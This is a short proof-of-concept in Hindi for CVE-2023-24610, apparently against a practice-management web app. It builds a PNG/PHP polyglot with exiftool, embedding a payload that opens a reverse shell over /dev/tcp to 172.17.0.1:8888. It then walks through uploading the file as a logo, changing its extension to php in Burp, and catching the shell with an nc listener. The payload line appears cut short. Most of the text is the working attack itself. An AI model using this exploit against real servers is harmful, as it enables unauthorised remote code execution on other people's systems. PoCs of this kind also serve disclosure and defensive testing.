
यह CVE-2023-24610 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है।
यह CVE-2023-24610 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है
हम exiftool का उपयोग करके एक पॉलीग्लॉट फ़ाइल बनाकर शुरू करते हैं: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

हम फ़ाइल को png में बदल देते हैं ताकि यह फ्रंट-एंड जाँच को पास कर सके

उसके बाद, हम शेल प्राप्त करने के लिए पोर्ट 8888 पर एक nc लिसनर शुरू करते हैं।

अगला कदम एप्लिकेशन में लॉग इन करना और setup पर क्लिक करना है

पृष्ठ के नीचे, हम एक प्रैक्टिस लोगो क्षेत्र देखते हैं। हम दाईं ओर स्थित edit बटन का उपयोग करके एक फ़ाइल अपलोड कर सकते हैं

हम edit पर क्लिक करते हैं और फिर browse पर क्लिक करते हैं, हम पहले चरण में बनाई गई “.png” फ़ाइल का चयन करते हैं

अपलोड पर क्लिक करने से पहले, हम सुनिश्चित करते हैं कि हम burp या इसी तरह की किसी चीज़ से अनुरोध को इंटरसेप्ट करते हैं। हम upload पर क्लिक करते हैं और burp में फ़ाइल एक्सटेंशन को “png” से “php” में बदल देते हैं

हम इंटरसेप्ट को बंद कर देते हैं ताकि हमारी फ़ाइल अपलोड हो जाए और हम पहले से शुरू किए गए nc लिसनर की जाँच करते हैं। हमारे पास एक रिवर्स शेल है और आईपी हमारे डॉकर कंटेनर की ओर इंगित करता है।
